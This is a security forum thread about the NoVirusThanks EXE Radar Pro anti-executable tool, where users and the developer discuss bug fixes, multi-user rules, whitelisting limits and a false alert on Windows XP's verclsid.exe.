New Antiexecutable: NoVirusThanks EXE Radar Pro

Discussion in 'other anti-malware software' started by sg09, Jun 3, 2011.

  1. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    763
    Location:
    Italy
    @Umbra

    Sure, we will add support for changing the icon based on protection mode later.

    It will be fixed on the next build.

    @mood

    It will be fixed on the next build.

    I like this enhancement, we'll discuss about it asap.

    They will be fixed on the next build.

    Thanks for reporting these issues guys :)
     
  2. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    The last time I tested NoVirusThanks EXE Radar Pro it was not multi-user friendly. In other words, the rules only applied to the current user. Is there an easy way to work around that, so the rules are applied globally (to all users)?

    Phil
     
  3. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    @pcalvert they are working on it, and it is what we beta test actively right now.
     
  4. Mister X

    Mister X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    2,941
    Location:
    Mexico
    If this the same issue then it is not fixed at all.
     
  5. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    Great, I'm glad to "hear" that.

    What seems strange to me is that the ruleset files are located here:
    Code:
    C:\ProgramData\NoVirusThanks\EXE Radar Pro\Data\
    Since the rules only apply to the current user, I thought for sure that the data files would be located somewhere within the user's profile, like the AppData directory. I was hoping to work around the issue by copying the needed files to the SUA profile, but obviously that isn't going to work.
     
  6. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    @pcalvert to use a multi-users setup with ERP v3.x.x., you have to export settings from one and import to the other, and even, after a reboot some of those aren't kept (especially the soft settings, rules are normally kept) .
     
  7. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    2,572
    Location:
    The etherlands
  8. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
  9. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    2,572
    Location:
    The etherlands
    OK, you are probably right.
     
  10. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    That is true in some way; anti-exe won't protect you from the exploit itself, only from what the exploit will do once it breached the system.
    An attack is not a one effect mechanism, it works by stages called attack chain, so you have to block the attack somewhere in the chain, earlier is better.
    Anti-exe and most security software will react when the dropper (if any) is executed by the poor user or when the exploit try to execute a monitored process.
     
    Last edited: Nov 21, 2017
  11. novirusthanks

    novirusthanks Developer

    Joined:
    Nov 5, 2010
    Posts:
    763
    Location:
    Italy
    @Mister X

    That is a different issue.

    We'll add the option "Set Alert Dialog to Always on Top" to fix that.

    @paulderdash

    Simply whitelisting of all exes is not good of course, that is why we introduced "Vulnerable Processes" and now (with ERP v4.0) Parent->Child control.

    The problem is if you whitelist PowerShell.exe, then a malicious .DOC file can exploit WINWORD.exe to run PowerShell.exe to download and execute a remote payload. Or it can run JavaScript code via Cmd.exe (so no need to drop a payload in the disk). PowerShell.exe and Cmd.exe are commonly used by exploits and should not be whitelisted (instead, they should be filtered). Thanks to Vulnerable Processes + filtering of Parent->Child + filtering of command-line, you can block or be alerted about this behavior.
     
  12. EASTER

    EASTER Registered Member

    Joined:
    Jul 28, 2007
    Posts:
    6,531
    Location:
    U.S.A. (South)
    Superb explanation in brief. Definitely one of the more important (for me anyway) notes of interest to pen in my defense vs attack (or vice-versa) journal.

    Appreciate it much. Other duties demanding my attention lately but a huge expression of gratitude to those needling out the bugs in these preliminary releases to date. All you guys rock! Special thanks developer andreas for the new work.
     
  13. paulderdash

    paulderdash Registered Member

    Joined:
    Dec 27, 2013
    Posts:
    2,572
    Location:
    The etherlands
  14. Umbra

    Umbra Registered Member

    Joined:
    Feb 10, 2011
    Posts:
    4,051
    Location:
    Europe then Asia
    It should stop it.
     
  15. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    9,889
    Location:
    The Netherlands
    I have to disagree with that comment. Not all attacks involve automatic exploits, so white-listing is still a must to protect users against manually installing malware. And a lot of exploits will still eventually run file-based malware, which also should be stopped via white-listing.
     
  16. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    Why would NVT ERP be giving me alerts for verclsid.exe, which is part of Windows XP SP3? Could it be because the file isn't digitally signed?
     
  17. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    Depends on your settings, and on where the file is located.
    If it is in windows folder, and you set ERP to auto-allow system files, then it should not alert, even if unsigned (this is assuming that it did not involve a command line containing a vulnerable process). Otherwise, it should alert.
     
  18. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    @schmu26

    Thanks for the quick reply. When the first alert appeared I clicked on the "Block" button. After rebooting I got the alert again and again clicked on the "Block" button. There have been no alerts since then. It's a fresh (new) install of NVT ERP, and I'm guessing that had a lot to do with it.
     
  19. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    Maybe you disabled the alert for it?
    Check if it is on the blocked list, and where it is located in the file system.
    If you were on ERP default settings, and this file is in the windows folder, you should not have gotten an alert in the first place.
    I know nothing about Windows XP, so maybe someone else can give you more informed input.
     
  20. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    It happened again when I right-clicked on a file in Windows Explorer. I've attached a screenshot of the alert message.

    Here's what was in the alert pop-up:
    Code:
    Unknown Application Detected
    
    Process Name: verclsid.exe
    
    Process Path: C:\WINDOWS\system32\
    
    Command-Line: /S /C {57CE581A-0CB6-4266-9CA0-19364C90A0B3} /I {000214E8-0000-0000-C000-000000000046} /X 0x401
    
    Parent Process: C:\WINDOWS\Explorer.EXE
    
    File Publisher: Microsoft Corporation
    
    File Description: Verify Class ID
    
    Digital Signature: False
    
    I checked the MD5 and SHA-1 values for verclsid.exe and confirmed that it is part of Windows. I also checked the blacklist inside NVT ERP, and it is empty.

    NVT ERP alert about verclsid.exe process.png
     
  21. mood

    mood Updates Team

    Joined:
    Oct 27, 2012
    Posts:
    3,100
    If it is not malicious and part of Windows, you can add the file to the whitelist. Else you'll see the prompt every time.
     
  22. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    By the way, since you are using ERP, it is obvious that you are serious about PC security. So you should seriously consider moving on to a more secure version of Windows. Don't assume that ERP or other security software is enough to make up for the inherent weaknesses of XP. You are still vulnerable because the XP operating system is not built to protect from modern malware. The Windows kernel is not protected well enough.
     
  23. pcalvert

    pcalvert Registered Member

    Joined:
    May 21, 2005
    Posts:
    219
    Actually, I do have Windows 8.1 Professional (retail), and I also locked in my free upgrade to Windows 10. However, I don't really like either of them. Using Windows 8.1 often makes me feel annoyed and frustrated, and I don't like feeling that way. Basically, the only reason I use it is to run tax software and other specialized software that requires a supported version of Windows.

    Since I dumped Windows 12 years ago in favor of Linux, I really only use Windows when I have no other choice. That being the case, I will only run Windows in a VM. And, unlike Windows 8.1 and Windows 10, Windows XP runs very well in a VM (on my hardware). Yes, you're right, using Windows XP is less than ideal from a security perspective, but I don't think that's reason enough to totally abandon it. A WinXP VM is useful for running old software, and the security situation can be improved considerably by heavily restricting the main "threat gates". Currently, IE and Firefox are forced to run sandboxed, and only Firefox is allowed to access the internet. But I think I will go ahead and lock down IE, Outlook Express, and WMP, etc., so they won't even be able to run if something tries to launch one of them. BTW, I think "surfing" the web on Windows XP nowadays is unwise; the main reason I have a web browser installed is because some software uses a web browser to access help files and other documentation.
     
    Last edited: Dec 8, 2017
  24. shmu26

    shmu26 Registered Member

    Joined:
    Jul 9, 2015
    Posts:
    502
    Yeah, I also use XP in a virtual machine, for legacy software.
     
Loading...